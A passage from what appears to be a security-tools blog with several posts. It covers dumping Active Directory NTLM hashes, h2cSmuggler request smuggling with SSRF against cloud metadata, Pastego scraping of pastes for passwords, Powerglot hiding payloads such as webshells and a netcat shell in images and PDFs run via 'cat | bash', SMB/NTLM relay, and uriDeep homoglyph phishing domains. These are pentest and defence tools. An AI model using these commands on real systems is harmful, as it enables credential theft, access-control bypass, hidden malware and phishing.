use of the -m flag will load the HIBP hashes into memory, which will allow for faster searching. Note this will require at least 24GB of available memory.

Getting input files

Step 1: Get an IFM AD database dump

On a domain controller use ntdsutil to generate an IFM dump of your AD domain. Run the following in an elevated PowerShell window:

ntdsutil
activate instance ntds
ifm
create full **output path**

Step 2: Recover NTLM hashes from this output

To recover the NTLM hashes from the AD IFM data, the Powershell module DSInternals is required.

Once installed, use the SYSTEM hive in the IFM data to recover the hashes in the format usernme:hash and save them to the file ad_ntlm_hashes.txt

$bootKey = Get-BootKey -SystemHivePath '.\registry\SYSTEM'
Get-ADDBAccount -All -DBPath '.\Active Directory\ntds.dit' -BootKey $bootKey | Format-Custom -View HashcatNT | Out-File ad_ntlm_hashes.txt -Encoding ASCII

Step 3: Download the latest HIBP hash file

The file can be downloaded from here

The latest version of the hash file contains around 551 million hashes.

Resources

ntdsutil & IFM

Download Lil-Pwny

↧

mapCIDR - Small Utility Program To Perform Multiple Operations For A Given subnet/CIDR Ranges

September 30, 2020, 4:30 am

≫ Next: H2Csmuggler - HTTP Request Smuggling Over HTTP/2 Cleartext (H2C)

≪ Previous: Lil-Pwny - Auditing Active Directory Passwords Using Multiprocessing In Python

Small utility program to perform multiple operations for a given subnet/CIDR ranges.

The tool was developed to ease load distribution for mass scanning operations, it can be used both as a library and as independent CLI tool.

Features

Simple and modular code base making it easy to contribute.
CIDR distribution for distributed scanning.
Stdin and stdout support for integrating in workflows

Installation:-

From Source

▶ GO111MODULE=auto go get -u github.com/projectdiscovery/mapcidr/cmd/mapcidr

From Github

▶ git clone https://github.com/projectdiscovery/mapcidr.git; cd mapcidr/cmd/mapcidr; go build .; cp mapcidr /usr/local/bin

Usage:-

▶ mapcidr -h

This will display help for the tool. Here are all the switches it supports.

Flag	Description	Example
-cidr	Single CIDR to process	mapcidr -cidr 173.0.84.0/24
-sbc	Slice by CIDR count	mapcidr -sbc 10
-sbh	Slice by HOST count	mapcidr -sbh 10000
-l	File containing list of CIDRs	mapcidr -l cidr.txt
-o	File to write output to (optional)	mapcidr -o output.txt
-silent	Make the output silent	mapcidr -silent
-version	Print current version of chaos client	mapcidr -version

Running mapCIDR

In order to get list of IPs for a give CIDR, use the following command.

▶ mapcidr -cidr 173.0.84.0/24
▶ echo 173.0.84.0/24 | mapcidr

                   ____________  ___    
  __ _  ___ ____  / ___/  _/ _ \/ _ \
 /  ' \/ _ '/ _ \/ /___/ // // / , _/   
/_/_/_/\_,_/ .__/\___/___/____/_/|_| v0.1
          /_/                                                     	 

		projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.

173.0.84.0
173.0.84.1
173.0.84.2
173.0.84.3
173.0.84.4
173.0.84.5
173.0.84.13
173.0.84.14
173.0.84.15
173.0.84.16

Slice by CIDR

In order to slice given CIDR or list of CIDR by CIDR count or slice into multiple and equal smaller subnets, use the following command.

▶ mapcidr -cidr 173.0.84.0/24 -sbc 10 -silent
▶ echo 173.0.84.0/24 | mapcidr -sbc 10 -silent

173.0.84.0/27
173.0.84.32/27
173.0.84.64/27
173.0.84.96/27
173.0.84.128/27
173.0.84.160/27
173.0.84.208/28
173.0.84.192/28
173.0.84.240/28
173.0.84.224/28

Slice by HOST

In order to slice given CIDR for equal number of host count in each CIDR, use the following command.

▶ mapcidr -cidr 173.0.84.0/16 -sbh 20000 -silent
▶ echo 173.0.84.0/16 | mapcidr -sbh 20000 -silent

173.0.0.0/18
173.0.64.0/18
173.0.128.0/18
173.0.192.0/18

Note: it's possible to obtain a perfect split only when the desired amount of slices or hosts per subnet is a powers of two. Otherwise the tool will attempt to automatically find the best split strategy to obtain the desired outcome.

Use mapCIDR as a library

It's possible to use the library directly in your go programs. The following code snippets outline how to divide a cidr into subnets, and how to divide the same into subnets containing a certain number of hosts

package main

import (
	"fmt"

	"github.com/projectdiscovery/mapcidr"
)

func main() {
	// Divide the CIDR into two subnets
	subnets1 := mapcidr.SplitN("192.168.1.0/24", 2)
	for _, subnet := range subnets1 {
		fmt.Println(subnet)
	}
	// Divide the CIDR into two subnets containing 128 hosts each
	subnets2 := mapcidr.SplitByNumber("192.168.1.0/24", 128)
	for _, subnet := range subnets2 {
		fmt.Println(subnet)
	}

	// List all ips in the CIDR
	ips, _ := mapcidr.Ips("192.168.1.0/24")
	for _, ip := range ips {
		fmt.Println(ip)
	}
}

mapCDIR is made with  by the projectdiscovery team.

Download Mapcidr

↧

H2Csmuggler - HTTP Request Smuggling Over HTTP/2 Cleartext (H2C)

September 30, 2020, 1:30 pm

≫ Next: Pastego - Scrape/Parse Pastebin Using GO And Expression Grammar (PEG)

≪ Previous: mapCIDR - Small Utility Program To Perform Multiple Operations For A Given subnet/CIDR Ranges

h2cSmuggler smuggles HTTP traffic past insecure edge-server proxy_pass configurations by establishing HTTP/2 cleartext (h2c) communications with h2c-compatible back-end servers, allowing a bypass of proxy rules and access controls.

See my detailed write-up below for:

Technical breakdown of the vulnerability
Insecure-by-default services
Remediation guidance

Here: https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c

How to test?

Any proxy endpoint that forwards h2c upgrade headers can be affected. Because h2c is intended to be performed only on cleartext channels, detection on HTTPS services often yields true positives.

By contrast, HTTP services may result in false positives. For example, h2c-enabled proxies may respond to the upgrade instead of forwarding it to an h2c back end.

Use the --scan-list option to test one or more web servers to look for affected proxy_pass endpoints. Consider using a list of directories discovered from directory enumeration, such as:

urls.txt

https://www.example.com/
https://www.example.com/api/
https://www.example.com/auth/
https://www.example.com/admin/
https://www.example.com/payments/
...omitted for brevity...

Run h2cSmuggler with the list of endpoints and a total number of threads:

./h2csmuggler.py --scan-list urls.txt --threads 5

Or, an individual test can be performed with:

./h2csmuggler.py -x https://www.example.com/api/ --test

Detecting with other popular tools:

Burp Extension (Active Scan check)
Nuclei-Template (Coming soon! Requires this issue to be fixed)

Exploitation

Once you have identified an affected endpoint that can be used for tunneling, you can now access or brute-force internal endpoints on the back-end server and provide custom verbs or headers. In the demo below, we demonstrate accessing an internal /flag endpoint by using h2c smuggling to bypass proxy deny rules.

To remediate, do not forward user-supplied values for Upgrade or Connection headers. See the technical post for additional guidance.

Install Instructions

The only dependency is the Python hyper-h2 library:

pip3 install h2

Test Environment and Demo

The test environment will allow you to experiment with h2cSmuggler in a controlled environment. docker-compose will simulate three chains of proxies that lead to an h2c-enabled Golang back end:

TCP port: Description
========  ===========
8000:     HTTP h2c backend
8001:     HAProxy -> h2c backend (Insecure default configuration)
8002:     nginx -> h2c backend  (Insecure custom configuration)
8003:     Nuster -> HAProxy -> h2c backend (Insecure configuration with multiple layers of proxies)

[1] Generate Certificates and spin up the environment with docker-compose:

# Generate certs
./configs/generate-certificates.sh

# Activate services
docker-compose up

All of the proxies deny access to the /flag endpoint accessible on the h2c back end. Let's attempt to access the forbidden endpoint via the HAProxy server running on port 8001:

We can use h2cSmuggler to confirm the proxy's insecure configuration using --test (or -t):

Now, let's use h2cSmuggler to perform an h2c upgrade, tunnel our HTTP/2 traffic through the proxy, and request the /flag endpoint from the back end, bypassing the proxy's access control:

For a deeper explanation of what is happening, check out the technical writeup.

Usage

h2cSmuggler uses a familiar curl-like syntax for describing the smuggled request:

usage: h2csmuggler.py [-h] [--scan-list SCAN_LIST] [--threads THREADS] [--upgrade-only] [-x PROXY] [-i WORDLIST] [-X REQUEST] [-d DATA] [-H HEADER] [-m MAX_TIME] [-t] [-v]
                      [url]

Detect and exploit insecure forwarding of h2c upgrades.

positional arguments:
  url

optional arguments:
  -h, --help            show this help message and exit
  --scan-list SCAN_LIST
                        list of URLs for scanning
  --threads THREADS     # of threads (for use with --scan-list)
  --upgrade-only        drop HTTP2-Settings from outgoing Connection header
  -x PROXY, --proxy PROXY
                        proxy server to try to bypass
  -i WORDLIST, --wordlist WORDLIST
                        list of paths to bruteforce
  -X REQUEST, --request REQUEST
                        smuggled verb
  -d DATA, --data DATA  smuggled data
  -H HEADER, --header HEADER
                           smuggled headers
  -m MAX_TIME, --max-time MAX_TIME
                        socket timeout in seconds (type: float; default 10)
  -t, --test            test a single proxy server
  -v, --verbose

Examples

1. Scanning a list of URLs (e.g., https://example.com:443/api/, https://example.com:443/payments, https://sub.example.com:443/) to identify proxy_pass endpoints that are susceptible to smuggling (be careful with thread counts when testing a single server):

./h2csmuggler.py --scan-list urls.txt --threads 5

2. Sending a smuggled POST request past https://edgeserver to an internal endpoint:

./h2csmuggler.py -x https://edgeserver -X POST -d '{"user":128457 "role": "admin"}' -H "Content-Type: application/json" -H "X-SYSTEM-USER: true" http://backend/api/internal/user/permissions

3. Brute-forcing internal endpoints (using HTTP/2 multiplexing), where dirs.txt represents a list of paths (e.g., /api/, /admin/).

/h2csmuggler.py -x https://edgeserver -i dirs.txt http://localhost/

4. ExploitingHost header SSRF over h2c smuggling (e.g., AWS metadata IMDSv2):

Retrieving the token:

./h2csmuggler.py -x https://edgeserver -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" http://169.254.169.254/latest/api/token`

Transmitting the token:

./h2csmuggler.py -x https://edgeserver -H "x-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/

5. Spoofing an IP address with the X-Forwarded-For header to access an internal dashboard:

./h2csmuggler.py -x https://edgeserver -H "X-Forwarded-For: 127.0.0.1" -H "X-Real-IP: 172.16.0.1" http://backend/system/dashboard

FAQ

Q: Why are there multiple responses from the server?

A: The first response is the data response to the original upgrade request initiated in HTTP/1.1, per the h2c upgrade protocol. The following responses are from the smuggled request.

Q: I received a "101 Switching Protocols" but I'm not receiving any data from the remote server.

A: I observed this behavior in my tests and found that some servers respond with a 101 status even if they do not actually support HTTP/2.

Q: Is establishing an h2c tunnel always a vulnerability?

A: No. Consider a TLS-terminating TCP load balancer (e.g., ELB) proxying directly to an h2c-compatible back end. Although you may be able to establish an h2c connection, if there are no access controls being enforced, then there are no access controls to bypass, or privilege gained by initiating this tunnel.

Q: Why does the smuggled request URI require a scheme? What is it used for?

A: The HTTP/2 protocol requires a :scheme psuedo-header. For our use case, http vs. https likely doesn't matter. For more details, see HTTP/2 RFC: Section 8.1.2.3.

Q: What should I use as the hostname for the back-end server?

A: It's best to start with the same hostname as the edge server. Next, try experimenting with alternative hostname values.

Author

Twitter: @theBumbleSec

GitHub: the-bumble

Download H2Csmuggler

↧

Pastego - Scrape/Parse Pastebin Using GO And Expression Grammar (PEG)

October 1, 2020, 4:30 am

≫ Next: Powerglot - Encodes Offensive Powershell Scripts Using Polyglots

≪ Previous: H2Csmuggler - HTTP Request Smuggling Over HTTP/2 Cleartext (H2C)

Scrape/Parse Pastebin using GO and grammar expression (PEG).

Installation

$ go get -u github.com/notdodo/pastego

Usage

Search keywords are case sensitive

pastego -s "password,keygen,PASSWORD"

You can use boolean operators to reduce false positive

pastego -s "quake && ~earthquake, password && ~(php || sudo || Linux || '<body>')"

This command will search for bins with quake but not earthquake words and for bins with password but not php, sudo, Linux, <body> words.

usage: pastego [<flags>]

Flags:
      --help              Show context-sensitive help (also try --help-long and --help-man).
  -s, --search="pass"     Strings to search, i.e: "password,ssh"
  -o, --output="results"  Folder to save the bins
  -i, --insensitive       Search for case-insensitive strings

Supported expression/operators:

`&&` - and

`||` - or

`~` - not

`'string with space'`

`(myexpression && 'with operators')`

Keybindings

q, ctrl+c: quit pastego

k, ↑: show previous bin

j, ↓: show next bin

n: jump forward by 15 bins

p: jump backward by 15 bins

N: move to the next block of findings (in alphabet order)

P: move to the previous block of findings (in alphabet order)

d: delete file from file system

HOME: go to top

Requirements

goquery

go get -u "github.com/PuerkitoBio/goquery"

kingpin

go get -u "gopkg.in/alecthomas/kingpin.v2"

gocui

go get -u "github.com/jroimartin/gocui"

To create the code from PEG use pigeon:

go get -u github.com/mna/pigeon

Disclaimer

You need a PRO account to use this: pastebin will block/blacklist your IP.

pastebin PRO

Or....

increase the time between each request
create a script to restart your router when pastebin warns you

In progress...

Add flag to pass/read a list of proxies to avoid IP ban/throttle for free users

Download Pastego

↧

Powerglot - Encodes Offensive Powershell Scripts Using Polyglots

October 1, 2020, 1:30 pm

≫ Next: smbAutoRelay - Provides The Automation Of SMB/NTLM Relay Technique For Pentesting And Red Teaming Exercises In Active Directory Environments

≪ Previous: Pastego - Scrape/Parse Pastebin Using GO And Expression Grammar (PEG)

Powerglot encodes several kind of scripts using polyglots, for example, offensive powershell scripts. It is not needed a loader to run the payload.

In red-team exercises or offensive tasks, masking of payloads is usually done by using steganography, especially to avoid network level protections, being one of the most common payloads scripts developed in powershell. Recent malware and APTs make use of some of these capabilities: APT32, APT37, Ursnif, Powload, LightNeuron/Turla, Platinum APT, Waterbug/Turla, Lokibot, The dukes (operation Ghost), Titanium, etc.

Powerglot is a multifunctional and multi-platform attack and defense tool based on polyglots. Powerglot allows to mask a script (powershell, shellscripting, php, ...) mainly in a digital image, although other file formats are in progress. Unlike the usual offensive tools or malware, Powerglot does not need any loader to execute the "information hidden", minimizing the noise on the target system.

PowerGlot has a clear utility in offensive tasks but it is also defined as a discovery and blue team tool. To our knowledge, it is the first general and complete open-source tool that allows to search for the presence of masked information with polyglots, information that could be useful to achieve persistence in a system or to hide malware (stego-malware, privilege escalation, lateral movement, reverse shell, etc.)

Features:

Encode powershell/shell script/php/.. in a polyglot image. It is not necessary a loader to recover/execute the hidden information (payload). PowerGlot works with several formats. Mainly, JPEG and PDF format. Other formats are in progress.
Powerglot is a complete open-source tool to detect (malicious) polyglots, specially the result of some public tools as Truepolyglot or stegoSploit. We works in several formats: JPEG, PNG, GIF, BMP, ZIP, PDF, MP3, etc.

Installation

# git clone https://github.com/mindcrypt/powerglot
# python3 powerglot

Usage & Parameters

Some examples to hide payloads using polyglots with Powerglot

# Example 1 - Hiding a powershell/php/shell script in a JPEG image

# python3 powerglot.py -o payload.ps1 cat.jpg cat-hidden1.jpg
# python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg
# python3 powerglot.py -o shell.sh cat.jpg cat-hidden3.jpg

# Example 2 - Hiding a shell script (linenum.sh) for privilege escalation "hidden" in a JPEG image

# python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg
# file cat-linenum.jpg (It is a valid JPEG file)
# feh cat-lineum.jpg (The image is properly showed in an image viewer)

# We can execute the script in several ways:

a) cat cat-linenum | bash
b) chmod +x cat-linenum.jpeg; ./cat-linenum.jpeg

# Example 3 - Hiding a cover-channel wiht netcat in a JPEG image

# Attacker
# echo "nc 127.0.0.1 4444" > netcat.sh
# python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg
# nc -nvlp 4444

#Victim
# chmod +x cat-netcat.jpg | ./cat-netcat.jpg

# Example 4 - Polyglot in PDF (Ej-linenum.sh)
# Create b64.sh with your favourite payload
base64 Linenum.sh -w 0 > b64.sh
# Edit b64.sh
echo "code in b64.sh" | base64 -d | bash;

# python3 powerglot -o b64.sh sample.pdf test.pdf
# file test.pdf
# xpdf test.pdf

# Execute payload
# cat test.pdf | bash or chmod +x test.pdf; ./test.pdf

# Example 5 - Powershell in JPEG (polyglot)
# python3 powerglot.py -o script.ps1 cat.jpeg cat-ps.jpeg
# file cat-ps.jpeg
# feh cat-ps.jpeg

# Execute payload (example)
# cat cat-ps.jpeg | pwsh

PS /home/alfonso/PowerGlot/POWERSHELL> get-process;<#hola <# mundo#>

 NPM(K)    PM(M)      WS(M)     CPU(s)      Id  SI ProcessName
 ------    -----      -----     ------      --  -- -----------
      0     0,00       2,70       0,00     830 829 (sd-pam)
      0     0,00       0,00       0,00      75   0 acpi_thermal_pm
      0     0,00       4,80       0,00    1217 854 agent
      0     0,00       1,70       0,00     748 748 agetty
      0     0,00      40,77       1,01    1198 854 applet.py
      0     0,00       6,29       0,00     938 938 at-spi-bus-launcher
      0     0,00       6,61       5,64     953 938 at-spi2-registryd
      0     0,00       0,00       0,00     131   0 ata_sff
         0     0,00       1,77       0,00    8906 …78 atom
      0     0,00     218,81     585,95    8908 …78 atom
      0     0,00     236,18     176,24    8947 …78 atom
      0     0,00     142,14       2,51    9009 …78 atom
      0     0,00      81,54       3,32    8932 …78 atom --type=gpu-process --enable-features=SharedArrayBuffer -…
      0     0,00      39,44       0,01    8910 …78 atom --type=zygote --no-sandbox
      0     0,00       5,62       0,11    1370 …70 bash
      0     0,00       5,36       0,66    5278 …78 bash
      0     0,00       6,34       1,48    6778 …78 bash
      0     0,00       0,00       0,00      68   0 blkcg_punt_bio
      0     0,00      46,73       2,20    1199 854 blueman-applet
      0     0,00      50,25       1,64    1301 854 blueman-tray

Some examples to detect polyglots in our filesystem

#python3 powerglot.py -d ./
--= [Detecting polyglots] --=
..............................................................
[Suspicious file]-[ ./cat-end-extra2.jpg ]..
[Suspicious file]-[ ./cat-end-extra3.jpg ][Polyglot Stegosploit][EOF Signature: */ -->]
.................................................................................
[Suspicious file]-[ ./cat-end-extra1.jpg ]..

Future work. Doing

We are working to support different file formats for encoding information in polyglots. Currently, we support several techniques in JPEG and PDF.
We are working to incorporate rules for the detection of polyglots in different formats. Currently, the presence of StegoSploit in JPEG files is detected (added */ --> after FFD9)

Download Powerglot

↧

smbAutoRelay - Provides The Automation Of SMB/NTLM Relay Technique For Pentesting And Red Teaming Exercises In Active Directory Environments

October 2, 2020, 4:30 am

≫ Next: uriDeep - Unicode Encoding Attacks With Machine Learning

≪ Previous: Powerglot - Encodes Offensive Powershell Scripts Using Polyglots

SMB AutoRelay provides the automation of SMB/NTLM Relay technique for pentesting and red teaming exercises in active directory environments.

Usage

Syntax: ./smbAutoRelay.sh -i <interface> -t <file> [-q] [-d] .

Example: ./smbAutoRelay.sh -i eth0 -t ./targets.txt .

Notice that the targets file should contain just the IP addresses of each target, one per line, to which you want to try the SMB/NTLM Relay technique.

Run ./smbAutoRelay.sh [-h] to see other options.

Software which installs in the current directory [ needed to run properly ]

Software which installs through apt , if not installed [ needed to run properly ]

tmux
rlwrap
python
python3
netcat
wget
xterm
net-tools

TODOs

Add the possibility to capture and crack the NetNTLM hashes.
Addapt it to use terminal profiles

Download smbAutoRelay

↧

uriDeep - Unicode Encoding Attacks With Machine Learning

October 2, 2020, 1:30 pm

≫ Next: Asnap - Tool To Render Recon Phase Easier By Providing Updated Data About Which Companies Owns Which Ipv4 Or Ipv6 Addresses

≪ Previous: smbAutoRelay - Provides The Automation Of SMB/NTLM Relay Technique For Pentesting And Red Teaming Exercises In Active Directory Environments

Unicode encoding attacks with machine learning. Tool based on machine learning to create amazing fake domains using confusables. Some domains can deceive IDN policies (Chrome & Firefox).

I created the best (big) dictionary of confusables using neural networks. It is used in the tool and it can be download from: https://github.com/mindcrypt/uriDeep/blob/master/data/deepDiccConfusables.txt

_mindcrypt@kali:~/tool/uriDeep# python3 uriDeep.py

            _    ___
 /\ /\ _ __(_)  /   \___  ___ _ __
/ / \ \ '__| | / /\ / _ \/ _ \ '_ \
\ \_/ / |  | |/ /_//  __/  __/ |_) |
 \___/|_|  |_/___,' \___|\___| .__/
                             |_|

 Version Beta
 Authors: Alfonso Muñoz (@mindcrypt)
          Miguel Hernández (@MiguelHzBz)

usage: uriDeep.py [-h] [-d, --domain DOMAIN] [-i FILEINPUT] [-F [FLIPPER]]
                  [-H [HOMOGLYPH]] [-l] [-S [SUBSTITUTION]] [-c] [-w] [-vt]
                  [-key API] [-o OUTPUTFILE]

UriDeep: Tool based on machine learning to create amazing fake domains using
confusables. Some domains can deceive IDN policies

optional arguments:
  -h, --help            show this help message and exit
  -d, --domain DOMAIN   check similar domains to this one
  -i FILEINPUT, --input FILEINPUT
                        List of targets. One input per line.
  -F [FLIPPER], --flipper [FLIPPER]
                        Execute flipping attack
  -H [HOMOGLYPH], --homoglyph [HOMOGLYPH]
                        Execute homoglyph attack with full table of
                        confusables
  -l, --light           To create fake domains that could deceive IDN policies
  -S [SUBSTITUTION], --substitution [SUBSTITUTION]
                        Execute substitution attack
  -c, --check           check if this domain is alive
  -w, --whois           check whois
  -vt, --virustotal     check Virus Total
  -key API, --api-key API
                        VirusTotal API Key
  -o OUTPUTFILE, --output OUTPUTFILE
                        Output file
None
Need one type of input, {-i --input} or {-d --domain}
root@kali:~/tool/uriDeep# python3 uriDeep.py -H -d www.example.org

            _    ___
 /\ /\ _ __(_)  /   \___  ___ _ __
/ / \ \ '__| | / /\ / _ \/ _ \ '_ \
\ \_/ / |  | |/ /_//  __/  __/ |_) |
 \___/|_|  |_/___,' \___|\___| .__/
                             |_|

 Version Beta
 Authors: Alfonso Muñoz (@mindcrypt)
          Miguel Hernández (@MiguelHzBz)

Domain target: www.example.org
Option selected: Homoglyph attack
Option selected: Full confusables
Generate similar domains...
Similars domains to example: 722
{'domain_punnycode': b'www.xn--xample-9ua.org', 'domain': 'www.éxample.org'}
{'domain_punnycode': b'www.xn--xample-vwe.org', 'domain': 'www.Έxample.org'}
{'domain_punnycode': b'www.xn--xample-oj9b.org', 'domain': 'www.Ὲxample.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝝆le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝐚mple.org'}
{'domain_punnycode': b'www.xn--exmple-4fc.org', 'domain': 'www.exǺmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝙓ample.org'}
{'domain_punnycode': b'www.xn--exmple-c639a.org', 'domain': 'www.ex𐐍mple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝐸xample.org'}
{'domain_punnycode': b'www.xn--exampl-gva.org', 'domain': 'www.examplé.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝐌ple.org'}
{'domain_punnycode': b'www.xn--exampe-fze.org', 'domain': 'www.examp𝛪e.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝝔le.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝜚le.org'}
{'domain_punnycode': b'www.xn--exampl-n21c.org', 'domain': 'www.exampl℮.org'}
{'domain_punnycode': b'www.xn--xample-hic.org', 'domain': 'www.ȇxample.org'}
{'domain_punnycode': b'www.xn--exampe-0ic.org', 'domain': 'www.exampȈe.org'}
{'domain_punnycode': b'www.xn--exmple-qxe8d.org', 'domain': 'www.exᾼmple.org'}
{'domain_punnycode': b'www.xn--xample-9nx.org', 'domain': 'www.ၿxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝔈xample.org'}
{'domain_punnycode': b'www.xn--xample-9nf.org', 'domain': 'www.Бxample.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.examp𝓘e.org'}
{'domain_punnycode': b'www.xn--exaple-kqf.org', 'domain': 'www.exaМple.org'}
{'domain_punnycode': b'www.xn--exampe-fdb.org', 'domain': 'www.exampĽe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exa𝓶ple.org'}
{'domain_punnycode': b'www.xn--exampe-7db.org', 'domain': 'www.exampŁe.org'}
{'domain_punnycode': b'www.xn--exampl-ud4w.org', 'domain': 'www.examplᎧ.org'}
{'domain_punnycode': b'www.xn--exmple-x92c.org', 'domain': 'www.ex𝝏mple.org'}
{'domain_punnycode': b'www.xn--exmple-jta.org', 'domain': 'www.exÀmple.org'}
{'domain_punnycode': b'www.xn--exmple-cze3996c.org', 'domain': 'www.exᾊmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝘦.org'}
{'domain_punnycode': b'www.xn--xample-9y8b.org', 'domain': 'www.Ἑxample.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝜶mple.org'}
{'domain_punnycode': b'www.exampie.org', 'domain': 'www.exampℑe.org'}
{'domain_punnycode': b'www.xn--exampe-mo0b.org', 'domain': 'www.exampᥣe.org'}
{'domain_punnycode': b'www.xn--exmple-xyc.org', 'domain': 'www.exəmple.org'}
{'domain_punnycode': b'www.xn--exaple-r4t.org', 'domain': 'www.exaตple.org'}
{'domain_punnycode': b'www.xn--exampl-ntr.org', 'domain': 'www.exampl౿.org'}
{'domain_punnycode': b'www.xn--exampe-tt6a.org', 'domain': 'www.exampᛁe.org'}
{'domain_punnycode': b'www.xn--exampl-1fx.org', 'domain': 'www.examplၕ.org'}
{'domain_punnycode': b'www.xn--exampe-fq0b.org', 'domain': 'www.exampᥬe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝘌xample.org'}
{'domain_punnycode': b'www.xn--exampe-0889d.org', 'domain': 'www.examp𝓁e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝖠mple.org'}
{'domain_punnycode': b'www.xn--exmple-4v49a.org', 'domain': 'www.ex\U000104b1mple.org'}
{'domain_punnycode': b'www.xn--xample-v339a.org', 'domain': 'www.𐐩xample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝔩e.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ｅxample.org'}
{'domain_punnycode': b'www.xn--exampl-nr4w.org', 'domain': 'www.examplꮼ.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝗔mple.org'}
{'domain_punnycode': b'www.xn--exampl-1we.org', 'domain': 'www.examplΈ.org'}
{'domain_punnycode': b'www.xn--exampe-mwa.org', 'domain': 'www.exampÏe.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝐗ample.org'}
{'domain_punnycode': b'www.xn--xample-hye.org', 'domain': 'www.ϵxample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampl𝔢.org'}
{'domain_punnycode': b'www.xn--xample-94a.org', 'domain': 'www.ěxample.org'}
{'domain_punnycode': b'www.xn--exmple-jua.org', 'domain': 'www.exåmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝔏e.org'}
{'domain_punnycode': b'www.xn--exmple-xw8b.org', 'domain': 'www.exἍmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.ex𝗮mple.org'}
{'domain_punnycode': b'www.xn--exaple-rh8a.org', 'domain': 'www.exa៣ple.org'}
{'domain_punnycode': b'www.xn--exmple-qh8d.org', 'domain': 'www.exȺmple.org'}
{'domain_punnycode': b'www.xn--exampe-fze.org', 'domain': 'www.examp𝝞e.org'}
{'domain_punnycode': b'www.xn--exmple-qta.org', 'domain': 'www.exámple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.eｘample.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝞠le.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.𝙴xample.org'}
{'domain_punnycode': b'www.xn--eample-bm29a.org', 'domain': 'www.e𐌢ample.org'}
{'domain_punnycode': b'www.xn--exampl-uxc.org', 'domain': 'www.examplƁ.org'}
{'domain_punnycode': b'www.xn--exampl-nye.org', 'domain': 'www.exampl𝜠.org'}
{'domain_punnycode': b'www.xn--exampe-mh3c.org', 'domain': 'www.examp∣e.org'}
{'domain_punnycode': b'www.xn--exampl-n4a.org', 'domain': 'www.examplĖ.org'}
{'domain_punnycode': b'www.xn--exmple-jgc.org', 'domain': 'www.exǽmple.org'}
{'domain_punnycode': b'www.xn--exmple-qxe.org', 'domain': 'www.ex𝞐mple.org'}
{'domain_punnycode': b'www.xn--exmple-qwe.org', 'domain': 'www.exΆmple.org'}
{'domain_punnycode': b'www.xn--eample-pra.org', 'domain': 'www.e×ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝒙ample.org'}
{'domain_punnycode': b'www.xn--exampl-180b.org', 'domain': 'www.examplᧉ.org'}
{'domain_punnycode': b'www.xn--eample-i53w.org', 'domain': 'www.eꞳample.org'}
{'domain_punnycode': b'www.xn--examle-z0e.org', 'domain': 'www.exam𝛠le.org'}
{'domain_punnycode': b'www.xn--exampl-g5a.org', 'domain': 'www.examplĚ.org'}
{'domain_punnycode': b'www.xn--exaple-krs.org', 'domain': 'www.exaതple.org'}
{'domain_punnycode': b'www.xn--exmple-j9b.org', 'domain': 'www.exǟmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.e𝗑ample.org'}
{'domain_punnycode': b'www.xn--exampl-1339a.org', 'domain': 'www.exampl𐐩.org'}
{'domain_punnycode': b'www.xn--exmple-xoc.org', 'domain': 'www.exȧmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exam𝒑le.org'}
{'domain_punnycode': b'www.xn--xample-2of.org', 'domain': 'www.Еxample.org'}
{'domain_punnycode': b'www.xn--xample-23a.org', 'domain': 'www.ĕxample.org'}
{'domain_punnycode': b'www.xn--xample-2ua.org', 'domain': 'www.Èxample.org'}
{'domain_punnycode': b'www.xn--exmple-x9b.org', 'domain': 'www.exǡmple.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.examp𝐋e.org'}
{'domain_punnycode': b'www.xn--eample-pr3d.org', 'domain': 'www.e⤬ample.org'}
{'domain_punnycode': b'www.example.org', 'domain': 'www.exampⅬe.org'}
{'domain_punnycode': b'www.xn--exampe-t29b.org', 'domain': 'www.exampῙe.org'}
{'domain_punnycode': b'www.xn--exampe-mxk.org', 'domain': 'www.exampߊe.org'}
{'domain_punnycode': b'www.xn--xample-ouf.org', 'domain': 'www.Ёxample.org'}
{'domain_punnycode': b'www.examp|e.org', 'domain': 'www.examp|e.org'}
{'domain_punnycode': b'www.xn--exampl-gvc.org', 'domain': 'www.examplɆ.org'}
{'domain_punnycode': b'www.xn--exampe-03z.org', 'domain': 'www.exampራe.org'}
{'domain_punnycode': b'www.exampIe.org', 'domain': 'www.exampIe.org'}
{'domain_punnycode': b'www.xn--exmple-c6q.org', 'domain': 'www.exఐmple.org'}
{'domain_punnycode': b'www.xn--exmple-cze7107c.org', 'domain': 'www.exᾍmple.org'}
